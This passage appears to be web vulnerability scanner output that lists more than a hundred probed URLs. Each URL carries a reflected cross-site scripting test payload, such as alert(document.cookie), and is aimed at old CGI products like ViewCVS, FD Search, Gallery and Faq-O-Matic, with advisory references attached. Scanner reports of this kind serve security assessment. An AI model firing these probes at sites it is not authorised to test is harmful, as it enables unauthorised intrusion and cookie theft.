  729. + OSVDB-6458: /index.1.html/cgi-home/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  730. + OSVDB-6458: /index.1.html/cgi-perl/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  731. + OSVDB-6458: /index.1.html/scgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  732. + OSVDB-6458: /index.1.html/cgi-bin-sdb/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  733. + OSVDB-6458: /index.1.html/cgi-mod/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>: ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.cert.org/advisories/CA-2000-02.html.
  734. + /index.1.html/cgi.cgi/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  735. + /index.1.html/webcgi/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  736. + /index.1.html/cgi-914/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  737. + /index.1.html/cgi-915/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  738. + /index.1.html/bin/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  739. + /index.1.html/cgi/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  740. + /index.1.html/mpcgi/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  741. + /index.1.html/cgi-bin/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  742. + /index.1.html/ows-bin/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  743. + /index.1.html/cgi-sys/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  744. + /index.1.html/cgi-local/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  745. + /index.1.html/htbin/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  746. + /index.1.html/cgibin/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  747. + /index.1.html/cgis/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  748. + /index.1.html/scripts/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  749. + /index.1.html/cgi-win/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  750. + /index.1.html/fcgi-bin/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  751. + /index.1.html/cgi-exe/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  752. + /index.1.html/cgi-home/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  753. + /index.1.html/cgi-perl/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  754. + /index.1.html/scgi-bin/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  755. + /index.1.html/cgi-bin-sdb/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  756. + /index.1.html/cgi-mod/test-cgi.exe?<script>alert(document.cookie)</script>: Default CGI is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  757. + OSVDB-9230: /index.1.html/cgi.cgi/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
  758. + OSVDB-9230: /index.1.html/webcgi/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
  759. + OSVDB-9230: /index.1.html/cgi-914/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
  760. + OSVDB-9230: /index.1.html/cgi-915/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
  761. + OSVDB-9230: /index.1.html/bin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
  762. + OSVDB-9230: /index.1.html/cgi/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
  763. + OSVDB-9230: /index.1.html/mpcgi/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
  764. + OSVDB-9230: /index.1.html/cgi-bin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
  765. + OSVDB-9230: /index.1.html/ows-bin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
  766. + OSVDB-9230: /index.1.html/cgi-sys/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
  767. + OSVDB-9230: /index.1.html/cgi-local/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
  768. + OSVDB-9230: /index.1.html/htbin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
  769. + OSVDB-9230: /index.1.html/cgibin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
  770. + OSVDB-9230: /index.1.html/cgis/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
  771. + OSVDB-9230: /index.1.html/scripts/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
  772. + OSVDB-9230: /index.1.html/cgi-win/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
  773. + OSVDB-9230: /index.1.html/fcgi-bin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
  774. + OSVDB-9230: /index.1.html/cgi-exe/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
  775. + OSVDB-9230: /index.1.html/cgi-home/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
  776. + OSVDB-9230: /index.1.html/cgi-perl/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
  777. + OSVDB-9230: /index.1.html/scgi-bin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
  778. + OSVDB-9230: /index.1.html/cgi-bin-sdb/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
  779. + OSVDB-9230: /index.1.html/cgi-mod/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>: Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. Upgrade to FDSE version 2.0.0.0055
  780. + OSVDB-2322: /index.1.html/cgi.cgi/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
  781. + OSVDB-2322: /index.1.html/webcgi/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
  782. + OSVDB-2322: /index.1.html/cgi-914/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
  783. + OSVDB-2322: /index.1.html/cgi-915/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
  784. + OSVDB-2322: /index.1.html/bin/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
  785. + OSVDB-2322: /index.1.html/cgi/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
  786. + OSVDB-2322: /index.1.html/mpcgi/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
  787. + OSVDB-2322: /index.1.html/cgi-bin/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
  788. + OSVDB-2322: /index.1.html/ows-bin/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
  789. + OSVDB-2322: /index.1.html/cgi-sys/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
  790. + OSVDB-2322: /index.1.html/cgi-local/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
  791. + OSVDB-2322: /index.1.html/htbin/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
  792. + OSVDB-2322: /index.1.html/cgibin/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
  793. + OSVDB-2322: /index.1.html/cgis/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
  794. + OSVDB-2322: /index.1.html/scripts/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
  795. + OSVDB-2322: /index.1.html/cgi-win/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
  796. + OSVDB-2322: /index.1.html/fcgi-bin/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
  797. + OSVDB-2322: /index.1.html/cgi-exe/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
  798. + OSVDB-2322: /index.1.html/cgi-home/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
  799. + OSVDB-2322: /index.1.html/cgi-perl/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
  800. + OSVDB-2322: /index.1.html/scgi-bin/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
  801. + OSVDB-2322: /index.1.html/cgi-bin-sdb/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
  802. + OSVDB-2322: /index.1.html/cgi-mod/search.php?searchstring=<script>alert(document.cookie)</script>: Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. http://www.securityfocus.com/bid/8288.
  803. + OSVDB-8661: /index.1.html/cgi.cgi/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
  804. + OSVDB-8661: /index.1.html/webcgi/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
  805. + OSVDB-8661: /index.1.html/cgi-914/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
  806. + OSVDB-8661: /index.1.html/cgi-915/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
  807. + OSVDB-8661: /index.1.html/bin/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
  808. + OSVDB-8661: /index.1.html/cgi/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
  809. + OSVDB-8661: /index.1.html/mpcgi/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
  810. + OSVDB-8661: /index.1.html/cgi-bin/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
  811. + OSVDB-8661: /index.1.html/ows-bin/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
  812. + OSVDB-8661: /index.1.html/cgi-sys/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
  813. + OSVDB-8661: /index.1.html/cgi-local/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
  814. + OSVDB-8661: /index.1.html/htbin/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
  815. + OSVDB-8661: /index.1.html/cgibin/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
  816. + OSVDB-8661: /index.1.html/cgis/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
  817. + OSVDB-8661: /index.1.html/scripts/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
  818. + OSVDB-8661: /index.1.html/cgi-win/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
  819. + OSVDB-8661: /index.1.html/fcgi-bin/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
  820. + OSVDB-8661: /index.1.html/cgi-exe/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
  821. + OSVDB-8661: /index.1.html/cgi-home/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
  822. + OSVDB-8661: /index.1.html/cgi-perl/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
  823. + OSVDB-8661: /index.1.html/scgi-bin/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
  824. + OSVDB-8661: /index.1.html/cgi-bin-sdb/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
  825. + OSVDB-8661: /index.1.html/cgi-mod/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) http://www.cert.org/advisories/CA-2000-02.html. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html
  826. + OSVDB-54110: /index.1.html/cgi.cgi/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
  827. + OSVDB-54110: /index.1.html/webcgi/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
  828. + OSVDB-54110: /index.1.html/cgi-914/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
  829. + OSVDB-54110: /index.1.html/cgi-915/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
  830. + OSVDB-54110: /index.1.html/bin/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
  831. + OSVDB-54110: /index.1.html/cgi/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
  832. + OSVDB-54110: /index.1.html/mpcgi/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
  833. + OSVDB-54110: /index.1.html/cgi-bin/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
  834. + OSVDB-54110: /index.1.html/ows-bin/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
  835. + OSVDB-54110: /index.1.html/cgi-sys/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
  836. + OSVDB-54110: /index.1.html/cgi-local/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
  837. + OSVDB-54110: /index.1.html/htbin/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
  838. + OSVDB-54110: /index.1.html/cgibin/fom.cgi?file=<script>alert('Vulnerable')</script>: Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. http://www.cert.org/advisories/CA-2000-02.html.
